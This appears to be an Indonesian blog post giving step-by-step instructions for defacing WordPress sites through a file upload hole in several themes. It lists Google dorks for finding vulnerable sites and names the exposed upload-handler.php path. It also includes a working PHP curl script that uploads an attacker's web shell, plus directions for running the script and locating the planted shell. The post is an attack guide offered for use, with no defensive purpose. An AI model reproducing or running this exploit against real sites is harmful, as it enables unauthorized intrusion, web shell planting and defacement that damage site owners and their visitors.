Cara Deface Dengan Exploit Themes File Upload
Exploit orange themes File Upload
Bahan-Bahan:
-XAMPP (Serch Di Google Banyak Kok)
-Shell
Langkah-Langkah:
1).Search Di Google Gunakan Dork
inurl:"/wp-content/themes/bordeaux-theme/"
inurl:"/wp-content/themes/bulteno-theme/"
inurl:"/wp-content/themes/oxygen-theme/"
inurl:"/wp-content/themes/radial-theme/"
inurl:"/wp-content/themes/rayoflight-theme/"
inurl:"/wp-content/themes/reganto-theme/"
inurl:"/wp-content/themes/rockstar-theme/"
2).Ane Pkek Dork Yang inurl:"/wp-content/themes/radial-theme/"
3).Jika Ketemu Masukan Exploit /wp-content/themes/radial-theme/functions/upload-handler.php jika Keluar Error Situsnya Vuln
4).Buat File Baru Berekstensi .php Contoh lol.php Dan Simpan Script Berikut Di Directory C:/XAMPP/php Masukan Script Berikut Edit-Edit Dikit :D
<?php
$uploadfile="shellKamu.php";
$ch = curl_init("http://site.com/wp-content/themes/radial-theme/functions/upload-handler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
5).Masukan Shell Ente Juga Jadi Ada Dua File Di Directory C:/XAMPP/php yaitu Shell Dan Script Tadi 6).Aktifkan XAMPP Klik Start Pada Apache
7).Buka cmd Dengan Cara Klik Start -> Run -> Ketik "cmd"
8).Ketik cd\xampp/php
9)ketik php namascript.php Contoh: php lol.php
10).Jika Succes Akan Ada Nama Shellnya :D
11).Untuk Letak Shellnya Ada Di
http://site.com/wp-content/uploads/2013/11/namashell.php
0 comments:
Post a Comment